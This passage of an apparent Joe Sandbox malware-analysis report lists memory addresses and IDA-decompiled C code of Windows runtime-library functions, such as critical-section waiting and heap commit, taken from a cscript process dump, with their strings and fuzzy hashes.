0x054efbbd
0x054efbbd
0x054efbbf
0x054efbbf
0x054efbc5
0x054efbcb
0x054efbf8
0x054efbf8
0x054efbfa
0x00000000
0x054efc00
0x054efc00
0x054efc03
0x00000000
0x054efc09
0x054efc09
0x054efc0f
0x054efc15
0x054efc23
0x054efc23
0x054efc25
0x054efc27
0x054efc75
0x054efc7c
0x054efc84
0x00000000
0x054efc29
0x054efc29
0x054efc2d
0x054efc30
0x0552bf0f
0x00000000
0x054efc36
0x054efc38
0x054efc3b
0x054efc41
0x0552bf17
0x0552bf19
0x0552bf48
0x0552bf4b
0x00000000
0x0552bf1b
0x0552bf22
0x0552bf24
0x0552bf26
0x00000000
0x0552bf2c
0x0552bf37
0x0552bf39
0x0552bf3b
0x00000000
0x0552bf41
0x0552bf41
0x0552bf41
0x0552bf41
0x0552bf45
0x00000000
0x0552bf45
0x0552bf3b
0x0552bf26
0x00000000
0x054efc47
0x054efc47
0x054efc49
0x054efcb2
0x054efcb4
0x054efcb6
0x054efcdc
0x054efcdc
0x00000000
0x054efcb8
0x054efcc3
0x054efcc5
0x054efcc7
0x00000000
0x054efcc9
0x054efcc9
0x054efccd
0x00000000
0x054efccd
0x054efcc7
0x00000000
0x054efc4b
0x054efc4b
0x054efc4e
0x054efc4e
0x054efc51
0x054efc51
0x054efc54
0x054efc5a
0x054efc5c
0x054efc5f
0x054efc61
0x054efc63
0x054efc65
0x054efc67
0x054efc6e
0x054efc72
0x054efc72
0x054efc72
0x054efc72
0x054efc67
0x054efc61
0x00000000
0x054efc5a
0x054efc49
0x054efc41
0x054efc30
0x054efc27
0x054efc03
0x054efbcd
0x054efbd3
0x054efbd9
0x054efbdc
0x054efbde
0x054efc99
0x054efc9b
0x054efc9d
0x054efcd5
0x054efcd5
0x054efc89
0x054efc89
0x00000000
0x054efc9f
0x054efc9f
0x054efca3
0x00000000
0x054efca3
0x00000000
0x054efbe4
0x054efbe4
0x054efbe4
0x054efbe4
0x054efbe9
0x054efbf2
0x00000000
0x054efbf2
0x054efbde
0x054efbcb
0x054efbab
0x054efc8b
0x054efc8b
0x054efc8c
0x054efb80
0x054efb72
0x054efb5e
0x054efc8d
0x054efc91
0x054efadf
0x054efadf
0x054efae1
0x054efae4
0x054efae7
0x054efaec
0x054efaf8
0x054efb00
0x054efb07
0x054efb0f
0x054efb0f
0x054efb07
0x00000000
0x054efaf8
0x054efadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0552BE0F

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 6445c1ea4de204715d1e30a248c48fb5525dfaa3b18bb026ef6a622d48352173
Instruction ID: 65780557818aa18a00de0f1636bfc75cd66e0af4e0b175d6e13587008f53247d
Opcode Fuzzy Hash: 6445c1ea4de204715d1e30a248c48fb5525dfaa3b18bb026ef6a622d48352173
Instruction Fuzzy Hash: C7A10471B10615ABEB21CB65C454BFAB7B6BF49721F1445AFE806DB780EB30D8098B80

Uniqueness

Uniqueness Score: -1.00%

Function 054B2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E054B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x55a5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x55a7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E054F97C0();
				}
				if( *0x55a79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x55a79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E054E1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E054D7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0554FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E054F9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E054EE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0550DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x55a6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x55a6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E054F9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E054F95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E054D7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E054D7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E05537016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0554FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x55a5350;
							if(_t109 != 0x55a5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0554FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E05545720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x054b2d8a
0x054b2d8a
0x054b2d92
0x054b2d96
0x054b2d9e
0x054b2da0
0x054b2da3
0x054b2da5
0x054b2da8
0x054b2dab
0x054b2db2
0x0550f9aa
0x0550f9ab
0x0550f9ae
0x0550f9ae
0x054b2db8
0x054b2dc2
0x0550f9b9
0x0550f9be
0x0550f9bf
0x0550f9bf
0x054b2dcf
0x0550f9c9
0x054b2dd5
0x054b2dd5
0x054b2dd5
0x054b2dde
0x054b2de1
0x054b2e70
0x054b2e72
0x054b2e72
0x054b2de7
0x054b2deb
0x054b2e7c
0x054b2e83
0x054b2e85
0x054b2e8b
0x054b2e8d
0x054b2e92
0x054b2e92
0x054b2e85
0x054b2df1
0x054b2df7
0x054b2df9
0x054b2df9
0x054b2dfc
0x054b2dff
0x054b2e02
0x00000000
0x054b2e05
0x054b2e0c
0x0550f9d9
0x054b2e12
0x054b2e12
0x054b2e12
0x054b2e1a
0x0550f9e3
0x0550f9e9
0x0550f9f0
0x0550f9f6
0x0550f9f8
0x0550f9f8
0x0550f9f0
0x054b2e23
0x0550fa02
0x0550fa03
0x0550fa05
0x0550fa06
0x00000000
0x054b2e29
0x054b2e29
0x054b2e2e
0x054b2e34
0x054b2e3e
0x00000000
0x00000000
0x054b2e44
0x054b2e47
0x054b2e4d
0x00000000
0x00000000
0x054b2e4f
0x054b2e54
0x00000000
0x00000000
0x054b2e5a
0x054b2e5f
0x054b2e9a
0x054b2ea4
0x054b2ea5
0x054b2ea8
0x054b2eaf
0x054b2eb2
0x054b2eb5
0x0550fae9
0x0550faeb
0x0550faed
0x0550faef
0x0550faf7
0x0550faf8
0x0550fafd
0x0550faff
0x0550fb04
0x0550fb04
0x0550faff
0x054b2ec0
0x054b2ec4
0x054b2ec6
0x054b2ec8
0x0550fb14
0x0550fb18
0x0550fb1e
0x0550fb21
0x0550fb21
0x054b2ece
0x054b2ece
0x054b2ece
0x054b2ed7
0x054b2e61
0x054b2e63
0x0550fa6b
0x0550fa71
0x0550fa76
0x0550fa78
0x0550fa8a
0x0550fa7a
0x0550fa83
0x0550fa83
0x0550fa8f
0x0550fa91
0x0550fa97
0x0550fa9d
0x0550faa4
0x0550faaa
0x0550faaf
0x0550fab1
0x0550fac3
0x0550fab3
0x0550fabc
0x0550fabc
0x0550fac8
0x0550facb
0x0550fadf
0x0550fadf
0x0550facb
0x0550faa4
0x0550fa91
0x054b2e6f
0x054b2e6f
0x054b2e5f
0x0550fa13
0x0550fa15
0x0550fa17
0x0550fa1f
0x0550fa21
0x0550fa22
0x0550fa25
0x0550fa28
0x0550fa2f
0x0550fa2f
0x0550fa2a
0x0550fa2a
0x0550fa2a
0x0550fa31
0x0550fa34
0x0550fa36
0x0550fa3c
0x0550fa3e
0x0550fa41
0x0550fa43
0x0550fa45
0x0550fa45
0x0550fa41
0x0550fa3c
0x0550fa4a
0x0550fa4f
0x0550fa51
0x0550fa53
0x0550fa56
0x0550fa5b
0x0550fa5e
0x00000000
0x0550fa5e
0x054b2e23

Strings

RTL: Re-Waiting, xrefs: 0550FA4A

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: ba46993a452f5535c5fb41eea7b55f647efc66b78e554d9eef44b92947543bdf
Instruction ID: eebedd42a02fad0a7f4fad36a2e7a6c5f73fac3ef91203218212ed865612c904
Opcode Fuzzy Hash: ba46993a452f5535c5fb41eea7b55f647efc66b78e554d9eef44b92947543bdf
Instruction Fuzzy Hash: D161F331B086449FEB31DF69C844BFEB7A6FF44714F1406ABE812976C0DBB4A94187A1

Uniqueness

Uniqueness Score: -1.00%

Function 05580EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05580EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0557FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E05581074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E054F9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0557A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0557A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x55a8b04 >> 0x14) + (_v44 -  *0x55a8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E054D7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0557138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E054D7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0556FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x55a8724 & 0x00000008) != 0) {
						E055752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E055815B5(0x55a8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x05580eb7
0x05580eb9
0x05580ec0
0x05580ec2
0x05580ecd
0x0558105b
0x0558105b
0x05581061
0x05581066
0x05581066
0x0558106b
0x05581073
0x05581073
0x05580ed3
0x05580ed6
0x05580edc
0x05580ee0
0x05580ee7
0x05580ef0
0x05580ef5
0x05580efa
0x05580efc
0x05580efd
0x05580f03
0x05580f04
0x05580f06
0x05580f07
0x05580f09
0x05580f0e
0x05580f14
0x05580f23
0x05580f2d
0x05580f34
0x05580f34
0x05580f14
0x05580f52
0x00000000
0x00000000
0x05580f58
0x05580f73
0x05580f74
0x05580f79
0x05580f7d
0x05580f80
0x05580f86
0x05580fab
0x05580fb5
0x05580fc6
0x05580fd1
0x05580fe3
0x05580fd3
0x05580fdc
0x05580fdc
0x05580feb
0x05581009
0x05581009
0x05581015
0x05581027
0x05581017
0x05581020
0x05581020
0x0558102f
0x0558103c
0x0558103c
0x05581048
0x05581050
0x05581050
0x05581055
0x00000000
0x05581055
0x05580f88
0x05580f9e
0x05580fa2
0x05580fa9
0x00000000
0x00000000
0x00000000
0x05580fa9
0x00000000

Strings

`, xrefs: 05580F16

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 8db913c2e2e780b56143f6ef3f3c1b3dfdf03028d78145152c15559157129482
Instruction ID: 80938d74dea3025c5b26ba717a25cca6b5e28da735b664933ba38c7d3abe8e5e
Opcode Fuzzy Hash: 8db913c2e2e780b56143f6ef3f3c1b3dfdf03028d78145152c15559157129482
Instruction Fuzzy Hash: BF51AE713087429FD325EF28D888B2BB7E5FBC4604F04492DF596A7290D671E90ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 054EF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E054EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E054D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E054F9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E054F9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E054F95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x6b2ba81a
							_t109 = L054D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x20036b2b
								E054FF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x20036b2b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E054F95D0();
										L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x054ef0d3
0x054ef0d9
0x054ef0e0
0x054ef0e7
0x054ef0f2
0x054ef0f4
0x054ef0f8
0x054ef100
0x054ef108
0x054ef10d
0x054ef115
0x054ef116
0x054ef11f
0x054ef123
0x054ef124
0x054ef12c
0x054ef130
0x054ef134
0x054ef13d
0x054ef144
0x054ef14b
0x054ef152
0x0552bab0
0x0552bab0
0x054ef158
0x054ef158
0x054ef15a
0x054ef160
0x054ef165
0x054ef166
0x054ef16f
0x054ef173
0x0552baa7
0x0552baa7
0x0552baab
0x00000000
0x054ef179
0x054ef179
0x054ef18d
0x054ef191
0x0552baa2
0x00000000
0x054ef197
0x054ef19b
0x054ef1a2
0x054ef1a9
0x054ef1af
0x054ef1b2
0x054ef1b6
0x054ef1b9
0x054ef1c0
0x054ef1c4
0x054ef1d8
0x054ef1df
0x054ef1e3
0x054ef1e6
0x054ef1eb
0x054ef1ee
0x054ef1f4
0x054ef20f
0x0552bab7
0x0552babb
0x0552bacc
0x0552bad1
0x054ef215
0x054ef218
0x054ef226
0x054ef22b
0x00000000
0x054ef22b
0x054ef1f6
0x054ef1f6
0x054ef1f9
0x054ef1fb
0x054ef1fb
0x054ef1f4
0x054ef191
0x054ef173
0x054ef152
0x054ef203

Strings

@, xrefs: 054EF124

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 0336cc82e93325940cf02833f28bf5adf4df03a792bfe827576d41acde4b819a
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: B5515A72604714ABC321DF19C840AABB7F9FF48710F00892EFA9597690E7B4E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05533540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E05533540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x55ad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E054F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E05533706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E054FFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E05533540;
						E054FFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0550DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E05540C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E054F97C0();
					}
					return E054FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E05533971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E05533884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E054FFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E054F9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E05533787(_a4,  &_v352, _t80);
						}
					}
					L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E054F95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x05533552
0x0553355a
0x0553355d
0x05533566
0x05533567
0x0553357e
0x0553358f
0x055335a1
0x055335a5
0x0553366b
0x0553366b
0x0553366d
0x05533672
0x05533679
0x05533685
0x0553368d
0x0553369d
0x055336a7
0x055336b8
0x055336c6
0x055336c7
0x055336dc
0x055336e1
0x055336e7
0x055336e9
0x055336e9
0x05533703
0x05533703
0x055335b5
0x055335c0
0x055335c4
0x00000000
0x00000000
0x055335ca
0x055335d7
0x055335e2
0x055335e6
0x055335e8
0x055335f5
0x055335fa
0x05533603
0x05533604
0x05533609
0x0553360a
0x05533612
0x05533613
0x0553361e
0x05533622
0x05533628
0x0553362f
0x0553362f
0x05533636
0x05533638
0x0553363b
0x05533642
0x05533642
0x05533636
0x05533657
0x05533657
0x0553365c
0x05533662
0x05533669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0553358F

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: 198b34e87f9cb1a54e7041426b6b707318ba7159d1e033db3aef866ea83d7217
Instruction ID: 157e2c2513111d7a81caee91b0aea8f2c16aa37fd19725e0ca73969193e7207c
Opcode Fuzzy Hash: 198b34e87f9cb1a54e7041426b6b707318ba7159d1e033db3aef866ea83d7217
Instruction Fuzzy Hash: 404117B2D0152D9FDB21DA54CC85FEEB77CAB44714F0145A6E709AB250DB309E88CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 055805AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E055805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E055807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E054F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0557A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0557A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E05581293(_t79, _v40, E055807DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E054D7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
